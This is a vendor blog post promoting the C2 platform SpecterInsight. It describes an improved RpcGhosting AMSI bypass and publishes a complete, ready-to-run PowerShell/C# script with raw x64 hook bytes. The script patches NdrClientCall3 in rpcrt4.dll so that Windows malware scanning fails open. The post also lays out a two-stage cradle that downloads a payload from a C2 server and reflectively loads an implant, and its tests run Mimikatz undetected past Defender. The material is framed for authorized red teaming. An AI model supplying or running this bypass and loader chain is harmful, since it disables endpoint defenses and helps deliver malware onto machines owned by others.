Improved RpcGhosting

This is a story about when your AMSI Bypass breaks your own downloader

A while back, I was integrating the RpcGhosting AMSI bypass into SpecterInsight and noticed that it broke several of my PowerShell loader pipeline integration tests intermittently. This post is going to describe how I identified and fixed RpcGhosting to not break all RPC calls in my process.

Table of Contents

TLDR

RpcGhosting AMSI bypass patches NdrClientCall3 in rpcrt4.dll to always return RPC_S_SERVER_UNAVAILABLE, causing AMSI’s RPC-based provider to fail open and stop scanning. The problem with the original implementation is that NdrClientCall3 handles all NDR-based RPC calls in the process, not just AMSI’s. Patching it unconditionally breaks Windows crypto, COM activation, certificate chain validation, and anything else that routes RPC through the standard NDR pipeline.

The bug that exposed this was HTTPS downloads silently failing after the bypass ran, with a misleading “The underlying connection was closed: An unexpected error occurred on a receive” error that looked like a network problem but was actually a crypto service RPC call hitting the patched function. The straightforward fixes don’t hold up, and the right solution requires knowing exactly who is calling NdrClientCall3 at the moment the hook fires.

The solution was a selective trampoline hook that inspects the first argument to NdrClientCall3 to determine whether the caller is amsi.dll, and only returns the error code in that case. Everything else routes through to the real function unmodified.

How the Payload Pipeline Works

The specific scenario where this surfaced is a two-stage delivery pipeline. The first stage is a cradle script that runs in PowerShell, downloads the actual payload script from the C2 server over HTTPS, and iex‘s it. The downloaded script’s job is to apply the AMSI bypass and then download and reflectively load the implant. So the execution order inside the second stage is:

Apply AMSI bypass
Download implant bytes
Assembly.Load the implant

The bypass runs first by design, since you want AMSI disabled before anything sensitive gets scanned. But with RPC Ghosting, that order creates a problem. The moment the bypass patches NdrClientCall3, the WebClient call in step 2 starts failing with "The underlying connection was closed: An unexpected error occurred on a receive." No implant download, no session.

What NdrClientCall3 Actually Is

NdrClientCall3 is the NDR stub dispatch function for client-side RPC calls. It lives in rpcrt4.dll and it handles argument marshaling and transport for essentially all COM/RPC calls that go through the standard NDR pipeline. AMSI’s provider uses it. So does the Windows crypto stack, COM activation, certificate chain validation, and a long list of other Windows subsystems that WebClient quietly leans on when making an HTTPS request.

When the bypass patches the function to always return 0x6BA (the hex value for RPC_S_SERVER_UNAVAILABLE), it is not selectively breaking AMSI; it is breaking every RPC call in the process. AMSI’s provider gives up and fails open, which is the desired outcome. But the TLS handshake for the HTTPS download also breaks, because somewhere in the certificate validation or key exchange path, Windows is making an RPC call to a crypto service, and that call is now also returning RPC_S_SERVER_UNAVAILABLE.

The error message "An unexpected error occurred on a receive" is the network stack’s way of telling you the TLS connection died under it. It is not an obvious RPC error, which is why this took a moment to understand. The WebClient call looks like a network failure, but the actual cause is deeper: a crypto service RPC call that should have succeeded didn’t.

The Obvious Fixes That Don’t Work

Once I understood the problem the obvious approach is: patch NdrClientCall3, let AMSI’s initialization fail and cache the failure, restore NdrClientCall3, then proceed with the download.

This doesn’t work cleanly. The difficulty is knowing when the AMSI state has been “committed.” AMSI doesn’t cache the failure of a single scan, the provider tries again on the next request. You’d have to keep the hook active across every scan boundary, which means keeping it active during the download, which gets you back to square one.

The other obvious approach is to reorder the pipeline so the download happens before the bypass. That’s architecturally cleaner but it means Assembly.Load runs without the bypass active, which is the other half of the problem, since the assembly load is exactly what AMSI’s module-loading scan path is watching for.

What you actually want is a hook that breaks AMSI’s RPC calls and nothing else.

The Differentiator

NdrClientCall3 takes a MIDL_STUBLESS_PROXY_INFO* as its first argument (pProxyInfo on x64, which means it arrives in RCX). That structure is a static const generated by the MIDL compiler and compiled directly into whichever DLL owns the proxy stub code.

When amsi.dll calls NdrClientCall3, pProxyInfo points into amsi.dll‘s own data section, because the proxy stubs for the Windows Defender AMSI provider interface are compiled into amsi.dll. When the TLS/crypto stack calls NdrClientCall3, pProxyInfo points somewhere else entirely, into ncrypt.dll, or crypt32.dll, or wherever those stubs live.

So the first argument tells us, reliably, who is making the call. If pProxyInfo falls within amsi.dll‘s loaded memory range, the call came from AMSI. If it doesn’t, let it through.

The Selective Hook

The implementation uses two memory allocations instead of one.

The first is a trampoline, a buffer containing the original 12 bytes stolen from NdrClientCall3‘s function prologue, followed by an indirect jump back to NdrClientCall3+12:

; offset +0: 12 stolen bytes (NdrClientCall3's original prologue)
; offset +12:
FF 25 00 00 00 00    ; jmp [rip+0]
; offset +18:
[8-byte absolute address of NdrClientCall3+12]

When a non-AMSI caller reaches this code, it executes the original prologue bytes and then continues into the real function body as if the patch was never there. The jmp [rip+0] encoding points to the qword at offset +18, which holds the return address into NdrClientCall3. The standard function prologue doesn’t use RIP-relative addressing, so the stolen bytes relocate cleanly.

The second allocation is the hook stub, the code that NdrClientCall3 now jumps to on entry. It compares RCX against amsi.dll‘s base address and the end of its memory range, and branches accordingly:

; +0x00
48 3B 0D 17 00 00 00    ; cmp rcx, [rip+0x17]     ; compare against amsi_start
72 0F                   ; jb call_original
; +0x09
48 3B 0D 16 00 00 00    ; cmp rcx, [rip+0x16]     ; compare against amsi_end
73 06                   ; jae call_original
; +0x12
B8 BA 06 00 00          ; mov eax, 0x6BA           ; RPC_S_SERVER_UNAVAILABLE
C3                      ; ret
; +0x18  call_original:
FF 25 10 00 00 00       ; jmp [rip+0x10]           ; jump to trampoline
; +0x1E  [8 bytes: amsi_start]
; +0x26  [8 bytes: amsi_end]
; +0x2E  [8 bytes: trampoline address]

The amsi_start and amsi_end values are filled in at runtime. Getting them takes three memory reads: the DOS header’s e_lfanew field at offset +0x3C gives the PE header offset, and SizeOfImage sits at e_lfanew + 0x50 in the optional header. amsi_start is GetModuleHandle("amsi.dll") and amsi_end is amsi_start + SizeOfImage.

The 12-byte patch on NdrClientCall3 is unchanged from the original technique, mov rax, stub_addr; jmp rax. The only difference is that it now jumps to the hook stub instead of a simple return-0 stub.

Putting It Together

In C# (the Add-Type version):

// Get amsi.dll's range
IntPtr amsiBase = Bypass.GetModuleHandle("amsi.dll");
int e_lfanew = Marshal.ReadInt32(IntPtr.Add(amsiBase, 0x3C));
int sizeOfImage = Marshal.ReadInt32(IntPtr.Add(amsiBase, e_lfanew + 0x50));
long amsiStart = amsiBase.ToInt64();
long amsiEnd = amsiStart + sizeOfImage;

// Steal the original 12 bytes for the trampoline
byte[] originalBytes = new byte[12];
Marshal.Copy(func, originalBytes, 0, 12);

// Build the trampoline
IntPtr trampoline = Bypass.VirtualAlloc(IntPtr.Zero, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
Marshal.Copy(originalBytes, 0, trampoline, 12);
Marshal.Copy(new byte[] { 0xFF, 0x25, 0x00, 0x00, 0x00, 0x00 }, 0, IntPtr.Add(trampoline, 12), 6);
Marshal.WriteInt64(IntPtr.Add(trampoline, 18), func.ToInt64() + 12);

// Build the hook stub (54 bytes)
byte[] stubBytes = new byte[] {
    0x48, 0x3B, 0x0D, 0x17, 0x00, 0x00, 0x00,
    0x72, 0x0F,
    0x48, 0x3B, 0x0D, 0x16, 0x00, 0x00, 0x00,
    0x73, 0x06,
    0xB8, 0xBA, 0x06, 0x00, 0x00,
    0xC3,
    0xFF, 0x25, 0x10, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // amsi_start
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // amsi_end
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // trampoline addr
};
IntPtr stub = Bypass.VirtualAlloc(IntPtr.Zero, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
Marshal.Copy(stubBytes, 0, stub, stubBytes.Length);
Marshal.WriteInt64(IntPtr.Add(stub, 0x1E), amsiStart);
Marshal.WriteInt64(IntPtr.Add(stub, 0x26), amsiEnd);
Marshal.WriteInt64(IntPtr.Add(stub, 0x2E), trampoline.ToInt64());

The patch on NdrClientCall3 then points to stub instead of the old return-0 buffer.

Full Implementation

The complete bypass as a self-contained PowerShell script:

if ($PSVersionTable.PSVersion.Major -gt 2) {
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public class RpcGhosting {
    [DllImport("kernel32")] static extern IntPtr GetModuleHandle(string n);
    [DllImport("kernel32")] static extern IntPtr GetProcAddress(IntPtr h, string p);
    [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, uint al, uint p);
    [DllImport("kernel32")] static extern bool VirtualProtect(IntPtr a, UIntPtr s, uint n, out uint o);

    const uint MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000;
    const uint PAGE_EXECUTE_READWRITE = 0x40, PAGE_READWRITE = 0x04;

    public static void Apply() {
        IntPtr rpcrt4 = GetModuleHandle("rpcrt4.dll");
        IntPtr func = GetProcAddress(rpcrt4, "NdrClientCall3");

        IntPtr amsiBase = GetModuleHandle("amsi.dll");
        int e_lfanew = Marshal.ReadInt32(IntPtr.Add(amsiBase, 0x3C));
        int sizeOfImage = Marshal.ReadInt32(IntPtr.Add(amsiBase, e_lfanew + 0x50));
        long amsiStart = amsiBase.ToInt64();
        long amsiEnd = amsiStart + sizeOfImage;

        byte[] originalBytes = new byte[12];
        Marshal.Copy(func, originalBytes, 0, 12);

        IntPtr trampoline = VirtualAlloc(IntPtr.Zero, new UIntPtr(32),
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(originalBytes, 0, trampoline, 12);
        Marshal.Copy(new byte[] { 0xFF, 0x25, 0x00, 0x00, 0x00, 0x00 },
            0, IntPtr.Add(trampoline, 12), 6);
        Marshal.WriteInt64(IntPtr.Add(trampoline, 18), func.ToInt64() + 12);

        byte[] stubBytes = new byte[] {
            0x48, 0x3B, 0x0D, 0x17, 0x00, 0x00, 0x00,              // cmp rcx, [rip+0x17]   ; amsi_start
            0x72, 0x0F,                                              // jb  call_original
            0x48, 0x3B, 0x0D, 0x16, 0x00, 0x00, 0x00,              // cmp rcx, [rip+0x16]   ; amsi_end
            0x73, 0x06,                                              // jae call_original
            0xB8, 0xBA, 0x06, 0x00, 0x00,                          // mov eax, 0x6BA
            0xC3,                                                    // ret
            0xFF, 0x25, 0x10, 0x00, 0x00, 0x00,                    // jmp [rip+0x10]         ; call_original
            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,        // [amsi_start]
            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,        // [amsi_end]
            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,        // [trampoline addr]
        };
        IntPtr stub = VirtualAlloc(IntPtr.Zero, new UIntPtr(64),
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(stubBytes, 0, stub, stubBytes.Length);
        Marshal.WriteInt64(IntPtr.Add(stub, 0x1E), amsiStart);
        Marshal.WriteInt64(IntPtr.Add(stub, 0x26), amsiEnd);
        Marshal.WriteInt64(IntPtr.Add(stub, 0x2E), trampoline.ToInt64());

        uint oldProtect;
        VirtualProtect(func, new UIntPtr(12), PAGE_READWRITE, out oldProtect);
        byte[] patch = new byte[12];
        patch[0] = 0x48; patch[1] = 0xB8;
        Array.Copy(BitConverter.GetBytes(stub.ToInt64()), 0, patch, 2, 8);
        patch[10] = 0xFF; patch[11] = 0xE0;
        Marshal.Copy(patch, 0, func, 12);
        VirtualProtect(func, new UIntPtr(12), oldProtect, out oldProtect);
    }
}
'@
    [RpcGhosting]::Apply()
}

Testing It

The concern going in was whether pProxyInfo actually comes from amsi.dll‘s address range when AMSI makes the call. The theory says it should, since the proxy stubs for the Windows Defender AMSI interface are compiled into amsi.dll and their static data lives there. But theory and reality don’t always match, especially with Windows internals.

The AmsiBypassEffectivenessTests already had test cases that cover both bypass modes:

AmsiBypassPowerShellCommandsTest runs a probe script that invokes Invoke-Mimikatz via iex and checks that it executes without Defender firing.
AmsiBypassModuleLoadingTest reflectively loads a win_any implant using Assembly.Load on inline Base64 bytes and checks the same.

Both passed with the selective hook in place, confirming that AMSI’s scan calls are still being intercepted correctly, with the pProxyInfo range check working as expected.

For the network side, the unit tests for RpcGhosting and RpcGhostingPowerShell were already calling GetAllNetworkInterfaces() after applying the bypass as a crash/stability check (this was added in a previous round because the original implementation was crashing processes that made network calls after the bypass). Those tests passed too, which means non-AMSI calls to NdrClientCall3 are successfully routing through the trampoline to the original function.

Finally, the full end-to-end test, a randomized five-iteration run of the two-stage download-and-load pipeline where RpcGhosting is now back in the EffectiveAgainstModuleLoading pool, passed cleanly in all iterations.

What This Changes Architecturally

Before this fix, RpcGhosting and RpcGhostingPowerShell were restricted to the EffectiveAgainstPowerShellCommands bypass pool, scenarios where AMSI needs to be disabled for script block execution and no subsequent WebClient download is needed. They couldn’t be used in download-then-load pipelines without breaking the download.

With the selective hook, both techniques are safe for EffectiveAgainstModuleLoading as well, which is the pool that the obfuscated script pipeline draws from. Each generated payload now has four techniques to draw from instead of two, with the RPC transport layer represented in the pool alongside the AmsiScanBuffer and hardware breakpoint approaches.

The trampoline also makes the technique strictly more correct than before. The original implementation was effective but was silently breaking non-AMSI subsystems as a side effect that happened not to matter in the specific scenarios it was being tested in. The selective hook is what the technique should have been from the start, doing exactly what it says it does and nothing more.

SpecterInsight

This selective hook is part of the AMSI bypass pool in SpecterInsight’s obfuscation pipeline. At payload generation time, the pipeline draws from that pool and randomizes technique selection across the payload, so no two generated scripts look the same and the bypass technique rotates. With this fix, RpcGhosting and RpcGhostingPowerShell are fully viable in the EffectiveAgainstModuleLoading pool, meaning download-and-load pipelines get RPC-based AMSI suppression without breaking their own HTTPS transport.

Small details like this are the critical factor that separates a C2 platform that holds up under real defensive conditions from one that works in a demo. SpecterInsight is built around that standard. The bypass pool, the obfuscation pipeline, AI-assisted operator tasking, and implant generation are all designed to stay operational as defenders iterate, not just to look good in controlled tests.

If you are running authorized red team operations and need a platform that handles the full stack at this level of rigor, SpecterInsight is worth a serious look.